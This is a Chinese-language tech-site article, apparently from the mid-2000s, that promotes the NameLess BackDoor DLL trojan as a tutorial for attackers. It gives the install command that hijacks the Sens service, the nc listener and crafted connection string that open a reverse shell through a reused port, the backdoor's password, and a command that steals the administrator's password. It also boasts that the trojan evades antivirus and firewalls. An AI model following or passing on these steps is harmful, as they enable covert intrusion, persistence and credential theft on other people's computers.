气疯安全工具——新兴DLL型木马复仇记
NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。
说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。
NameLess BackDoor实战演练
将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。
| 天极软件专题专区精选 | |||
| Windows Vista专区 | POPO专区 | QQ专区 QQ挂机 | 注册表应用专区 |
| Flash MX 视频教程 | Photoshop视频教程 | 网页设计视频教程 | 照片处理数字暗房 |
| PPT动画演示教程 | Excel动画教程集 | Word动画演示教程 | Google专区 |
| 特洛伊木马专区 | 黑客知识教程专区 | 防火墙应用专区 | 了解Web2.0 |
| Windows API开发专区 | 网络编程专区 | VB数据库编程专区 | 图像处理与多媒体编程 |
一、随风潜入夜——安装
下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。
怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!
在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):
Rundll32 NameLess.dll,Install
执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。
小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。
二、穿墙细无声——连接
安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。
我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:
nc
-l -p 12345
命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):
nc 192.168.1.11 139
建立连接后输入如下内容(如图3):
dargun|192.168.1.11:12345
其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)
三、为我所欲为——控制
成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess
BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。
1.巧盗管理员密码
连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!
在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的!
阅读关于 木马 杀毒软件 防火墙 安全工具 的全部文章
- · Mac黑客大赛 冠军30分钟获OS管理员权限
- · 盗版/低端用户无缘Win Vista图形特效
- · 轻松一招 摆脱流氓软件烦恼
- · Windows卸载顽固程序另类小技巧
- · 手动去除桌面快捷方式的小箭头
- · Opera 更新到9.0 8333 Beta
- · 傲游(Maxthon) 1.5.3 新版火热出炉
- · 创新没有尺度 Google新功能提前曝光
- · 用于Firefox的Google工具栏Beta 2发布
- · Internet Explorer 7 Build 5358截图欣赏
- · Maxthon 检查更新出现“即划即译”新插件
- · 千千静听“批量修改”去除站点“烙印”
- · 小窍门:IE右下角地球图标的妙用
- · 媒体分类软件WhereIsIt v3.72 build 327
- · 让暴风影音对CNNIC插件说“不”
- · 巧用拼音加加内置功能 神奇提升输入速度
- · 隔墙有耳 Linux系统下的网络监听技术
- · .NET泛型技巧之类型参数之间的转换
- · .NET中如何在调用COM时得到返回参数值
- · 面向.NET开发人员的Ajax 技术平台策略
- · 轮番上阵:Linux下查找漏洞的N种兵器
- · Linux、Windows和64位计算的故事
- · 基于Linux的网络安全策略和保护措施
- · 一招吃遍天 一个文件搞定系统所有问题
- · 搜索入口 让电脑病毒快速现出原形
- · 防范病毒如影随形 让软件拒绝病毒干扰
- · 实用技巧:几个易被误认为病毒的文件
- · 从PC到PDA 病毒技术再次实现“跨越”
- · 首个hotmail病毒被截获 熟人邮件要小心
- · 瑞星3月14日病毒预警:具多种功能的后门
- · 与病毒赛跑,系统中毒之后的自救
- · WPS2005个人版首次大规模免费升级
- · Excel 2000中隐藏着一个3D赛车游戏
- · 国内最大色情网站情色六月天创办者被起诉
- · 内网安全技术十大策略 打造坚固的内网
- · 垃圾邮件黑幕揭密:黑夜有多黑 我就多黑
- · 信息产业部两记重拳 开打信息垃圾
- · 避免被发现 垃圾邮件发送者改打地道战